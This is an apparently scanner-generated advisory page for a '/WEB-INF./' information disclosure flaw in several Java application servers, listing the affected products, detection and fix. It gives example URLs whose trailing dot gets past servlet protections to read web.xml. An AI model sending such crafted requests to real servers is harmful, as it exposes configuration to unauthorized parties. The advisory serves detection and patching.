Free and open-source vulnerability scanner
Mageni eases for you the vulnerability scanning, assessment, and management process. It is free and open-source.
Install NowAvailable for macOS, Windows, and Linux
'/WEB-INF./' Information Disclosure Vulnerability (HTTP)
Information
Severity
Severity
Family
Family
CVSSv2 Base
CVSSv2 Base
CVSSv2 Vector
CVSSv2 Vector
Solution Type
Solution Type
Created
Created
Modified
Modified
Summary
Various application or web servers / products are prone to an information disclosure vulnerability.
Insight
Insight
The servlet specification prohibits servlet containers from serving resources in the '/WEB-INF' and '/META-INF' directories of a web application archive directly to clients. This means that URLs like: http://example.com/WEB-INF/web.xml will return an error message, rather than the contents of the deployment descriptor. However, some application or web servers / products are prone to a vulnerability that exposes this information if the client requests a URL like this instead: http://example.com/WEB-INF./web.xml http://example.com/web-inf./web.xml (note the trailing dot ('.') after 'WEB-INF').
Affected Software
Affected Software
The following products are known to be affected: - Sybase EA Server 4.0 - OC4J - Oracle Containers for J2EE - Orion 1.5.3 - JRun 3.0, 3.1 and JRun 4 - Macromedia / Allaire JRun - HPAS 8.0 - Hewlett Packard App Server - Pramati 3.0 - Pramati App Server - WildFly (formerly JBoss Application Server) before 10.0.0.Final - HPE B-Series SAN Network Advisor Software Running WildFly (formerly JBoss Application Server) Other products might be affected as well.
Detection Method
Detection Method
Sends a crafted HTTP GET request and checks the response.
Solution
Solution
The following vendor fixes are known: - Update WildFly to version 10.0.0.Final or later. For other products please contact the vendor for more information on possible fixes.